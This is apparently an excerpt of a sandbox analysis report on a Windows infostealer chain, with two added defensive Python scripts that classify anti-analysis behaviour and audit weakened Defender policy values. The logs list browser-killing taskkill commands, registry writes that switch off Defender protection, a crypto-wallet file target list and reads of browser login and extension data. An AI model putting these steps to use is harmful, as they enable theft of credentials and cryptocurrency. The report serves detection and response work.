Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
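The anti-analysis lines earlier in this section (analysis-tool window names, the SoftICE device names NTICE/SICE/SIWVID, the DebugPort queries, the rdtsc timing check) and the taskkill lines just above are the kind of observations an analyst wants to roll up per process rather than read one by one. The following is an added example, not part of the sandbox report: a small classifier that parses lines in the report's own "Source: <process> <event>" format, assigns each event to a technique family, and flags a process when two independent positive-weight families co-occur. SAMPLE_LINES is a constructed excerpt of lines from this report; the family rules, weights and threshold are the editor's assumptions. It deliberately gives zero weight to the `IsDebuggerPresent,SetUnhandledExceptionFilter` sequence, which is the MSVC CRT crash handler found in most compiled binaries, so that K7IHXYTNUQJPI2M9UU0ECLE1K.exe is not flagged on that evidence alone.

```python
"""Classify sandbox behaviour lines into anti-analysis technique families.

Added example, not part of the report: SAMPLE_LINES is a constructed excerpt of
the "Source: ..." lines above; the family rules, weights and threshold are the
editor's own assumptions.
"""
from __future__ import annotations

import re
from collections import defaultdict

SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Open window title or class name: procmon_window_class",
    r"Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Open window title or class name: ollydbg",
    r"Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe File opened: SICE",
    r"Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Process queried: DebugPort",
    r"Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Code function: 4_2_050400EB rdtsc 4_2_050400EB",
    r"Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6EAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6C6EAC62",
    r"Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Memory protected: page guard",
    r"Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T",
    r"Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T",
]

LINE_RE = re.compile(r"^Source: (?P<path>\S+) (?P<event>.*)$")
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)

# (family, weight, pattern). Weights are assumptions: behaviour that only makes
# sense for code hunting analysts scores high; CRT boilerplate scores zero.
FAMILIES = [
    ("analysis_tool_window", 3, re.compile(
        r"Open window title or class name: (procmon|ollydbg|filemon|.*sysinternals)", re.I)),
    # \\.\NTICE, \\.\SICE and \\.\SIWVID are the SoftICE kernel-debugger device names.
    ("kernel_debugger_device", 3, re.compile(r"File opened: (NTICE|SICE|SIWVID)\b")),
    # NtQueryInformationProcess(ProcessDebugPort) returns non-zero under a debugger.
    ("debug_port_query", 2, re.compile(r"Process queried: DebugPort")),
    ("rdtsc_timing", 2, re.compile(r"Code function: \S+ rdtsc\b")),
    ("page_guard", 1, re.compile(r"Memory protected: page guard")),
    # IsDebuggerPresent followed by SetUnhandledExceptionFilter is the MSVC CRT's
    # crash handler, emitted into most compiled binaries: no weight on its own.
    ("isdebuggerpresent_crt", 0, re.compile(r"IsDebuggerPresent,SetUnhandledExceptionFilter")),
    # Killing browsers releases the exclusive locks on their credential/cookie databases.
    ("browser_kill", 3, re.compile(
        r"taskkill(\.exe)? /F /IM (chrome|firefox|msedge|opera|brave)\.exe", re.I)),
]


def classify(lines: list[str]) -> dict[str, dict[str, int]]:
    """Map each process name to the families it triggered and their weights."""
    per_proc: dict[str, dict[str, int]] = defaultdict(dict)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        path, event = m["path"], m["event"]
        proc = path.rsplit("\\", 1)[-1]
        if TEMP_RE.search(path):
            per_proc[proc]["temp_resident"] = 1  # context flag, not a technique
        for family, weight, pattern in FAMILIES:
            if pattern.search(event):
                per_proc[proc][family] = weight
    return dict(per_proc)


def is_suspicious(families: dict[str, int], threshold: int = 4) -> bool:
    """Two independent positive-weight signals whose weights reach the threshold."""
    positive = [f for f, w in families.items() if w > 0]
    return len(positive) >= 2 and sum(families.values()) >= threshold


def report(lines: list[str], threshold: int = 4) -> dict[str, tuple[list[str], int, bool]]:
    """Per process: sorted family names, total score, and the verdict."""
    return {
        proc: (sorted(fams), sum(fams.values()), is_suspicious(fams, threshold))
        for proc, fams in classify(lines).items()
    }


if __name__ == "__main__":
    for proc, (fams, total, flagged) in report(SAMPLE_LINES).items():
        print(f"{proc}: score={total} flagged={flagged} {fams}")
```

On the sample, C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe is flagged on three unrelated anti-analysis families, 5e28f62265.exe is flagged because a binary resident in %TEMP% force-kills browsers, and K7IHXYTNUQJPI2M9UU0ECLE1K.exe is not flagged, since its only evidence is CRT boilerplate plus a PAGE_GUARD allocation. The same loop can be pointed at a full exported report.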
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C734760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 6_2_6C734760
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C611C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 6_2_6C611C30
Source: 5e28f62265.exe, 0000000E.00000000.2797533174.00000000009B2000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2581096431.0000000000C03000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: Program Manager
Source: e192e43b61.exe, 0000000A.00000002.3022668199.0000000000BC3000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: &Program Manager
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe, 6IF65DE3AL7UEH5E4W09DIZ.exe, 00000004.00000002.2119527104.000000000112F000.00000040.00000001.01000000.00000006.sdmp, skotes.exe, skotes.exe, 00000005.00000002.2145483793.000000000067F000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: `Program Manager
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000002.2448369339.0000000000381000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: fProgram Manager
Source: firefox.exe, 0000001D.00000002.2944162932.0000009976DFB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?ProgmanListenerWi
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6EAE71 cpuid 6_2_6C6EAE71
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001608001\num.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C6EA8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_6C6EA8DC
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C638390 NSS_GetVersion, 6_2_6C638390
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Registry value created: TamperProtection 0
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
Source: file.exe, 00000000.00000003.1804551591.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1803782267.0000000001762000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2679740158.00000000011A9000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2679872319.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2883449383.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2830596978.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2842380759.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2824471510.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2823881110.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2844205318.0000000005A99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: file.exe, 00000000.00000003.1872745681.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1810944593.0000000005E14000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dows Defender\MsMpeng.exe
Source: file.exe, file.exe, 00000000.00000003.1872781247.0000000001762000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1804603796.0000000001762000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
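The registry writes above are the part of this report a responder can act on directly: the Policies hive is empty on an unmanaged machine, so any of these values being present is a finding, and `DisableRealtimeMonitoring` is exactly the change Tamper Protection exists to block, which is why the same dropper also tries to write `TamperProtection 0`. The following is an added example, not part of the report, that encodes those checks as an audit. REPORT_SNAPSHOT is constructed from the lines above (the Windows Update values are recorded only as present, because the report prints no data for them); the `HKLM\SOFTWARE\Microsoft\Windows Defender\Features` path for TamperProtection is an assumption, since the report does not print that key. On Windows the script reads the live registry through the standard library `winreg` module; elsewhere it audits the snapshot.

```python
"""Audit the Defender and Windows Update policy values this report shows being set.

Added example, not part of the report. REPORT_SNAPSHOT is constructed from the
registry writes listed above; the TamperProtection key path is an assumption.
"""
from __future__ import annotations

import sys
from dataclasses import dataclass


@dataclass(frozen=True)
class Check:
    key: str          # full HKLM path in the form the report prints
    value: str
    bad: int | None   # value that weakens protection; None = any presence is notable
    why: str


DEFENDER_RTP = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"
SEC_CENTER = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications"
TAMPER = r"HKLM\SOFTWARE\Microsoft\Windows Defender\Features"  # assumed location
WU_POLICY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate"

CHECKS = [
    Check(DEFENDER_RTP, "DisableRealtimeMonitoring", 1, "real-time scanning disabled by policy"),
    Check(DEFENDER_RTP, "DisableIOAVProtection", 1, "downloaded and attached files no longer scanned"),
    Check(SEC_CENTER, "DisableNotifications", 1, "Security Center notifications suppressed"),
    Check(TAMPER, "TamperProtection", 0, "tamper protection disabled"),
    Check(WU_POLICY + r"\AU", "AUOptions", None, "automatic update behaviour forced by policy"),
    Check(WU_POLICY + r"\AU", "AutoInstallMinorUpdates", None, "minor-update installation forced by policy"),
    Check(WU_POLICY, "DoNotConnectToWindowsUpdateInternetLocations", None,
          "client may be cut off from Microsoft update servers"),
]

# Constructed from the report: a value of None means "present, data not printed".
REPORT_SNAPSHOT: dict[tuple[str, str], int | None] = {
    (SEC_CENTER, "DisableNotifications"): 1,
    (DEFENDER_RTP, "DisableIOAVProtection"): 1,
    (DEFENDER_RTP, "DisableRealtimeMonitoring"): 1,
    (TAMPER, "TamperProtection"): 0,
    (WU_POLICY + r"\AU", "AUOptions"): None,
    (WU_POLICY + r"\AU", "AutoInstallMinorUpdates"): None,
    (WU_POLICY, "DoNotConnectToWindowsUpdateInternetLocations"): None,
}


def audit(snapshot: dict[tuple[str, str], int | None]) -> list[tuple[str, str, str]]:
    """Return (key, value name, reason) for every check the snapshot trips."""
    findings = []
    for c in CHECKS:
        if (c.key, c.value) not in snapshot:
            continue  # absent: not set by policy
        observed = snapshot[(c.key, c.value)]
        # Presence-only checks always fire; value checks fire on the bad value,
        # and conservatively when the value could not be read.
        if c.bad is None or observed is None or observed == c.bad:
            findings.append((c.key, c.value, c.why))
    return findings


def read_live() -> dict[tuple[str, str], int | None]:
    """Snapshot the checked values from the local registry (Windows only)."""
    import winreg  # standard library, importable only on Windows

    snap: dict[tuple[str, str], int | None] = {}
    for c in CHECKS:
        hive, _, sub = c.key.partition("\\")
        assert hive == "HKLM"
        try:
            # KEY_WOW64_64KEY reads the native 64-bit view even from 32-bit Python,
            # where parts of HKLM\SOFTWARE would otherwise be redirected to WOW6432Node.
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, sub, 0,
                                winreg.KEY_READ | winreg.KEY_WOW64_64KEY) as k:
                snap[(c.key, c.value)] = winreg.QueryValueEx(k, c.value)[0]
        except FileNotFoundError:
            pass  # key or value does not exist
    return snap


if __name__ == "__main__":
    snapshot = read_live() if sys.platform == "win32" else REPORT_SNAPSHOT
    for key, name, why in audit(snapshot):
        print(f"{key}\\{name}: {why}")
```

Against the snapshot built from this report all seven checks fire. Remediation is the reverse of what the dropper did (delete the policy values rather than set them to 0, so the machine returns to "not configured"), and the WMI query for `ROOT\SecurityCenter2 AntiVirusProduct` in the lines above is a reminder that the stealers also enumerate third-party AV, so the audit should be extended with whatever product the host actually runs.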

Stealing of Sensitive Information

Source: Yara match File source: 33.2.C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.skotes.exe.490000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.6IF65DE3AL7UEH5E4W09DIZ.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000003.2308287602.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2100193708.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.2906938578.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2140947944.0000000000491000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2950501488.0000000000E31000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2031756029.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2119358992.0000000000F41000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: e192e43b61.exe PID: 1420, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: e192e43b61.exe PID: 1340, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: e192e43b61.exe PID: 5744, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 32.0.num.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.num.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.b0b9f39429.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.b0b9f39429.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.K7IHXYTNUQJPI2M9UU0ECLE1K.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000002.3015827110.000000000076E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2750222076.0000000000BA1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2901676931.0000000000BA1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2580293430.0000000000821000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2582005430.000000000127E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.3019501243.0000000000861000.00000080.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.2852632926.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2709864138.0000000005560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.2857203948.0000000000861000.00000080.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2142029213.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: K7IHXYTNUQJPI2M9UU0ECLE1K.exe PID: 5460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b0b9f39429.exe PID: 8148, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b0b9f39429.exe PID: 3916, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: K7IHXYTNUQJPI2M9UU0ECLE1K.exe PID: 5460, type: MEMORYSTR
Source: file.exe String found in binary or memory: Wallets/Electrum
Source: file.exe String found in binary or memory: Wallets/ElectronCash
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: file.exe String found in binary or memory: window-state.json
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.conf.json
Source: file.exe, 00000000.00000003.1786821317.0000000001774000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008AF000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: file.exe String found in binary or memory: ExodusWeb3
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: file.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008A8000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: MultiDoge
Source: file.exe, 00000000.00000003.1786821317.000000000175D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum-LTC\wallets\\*.*
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
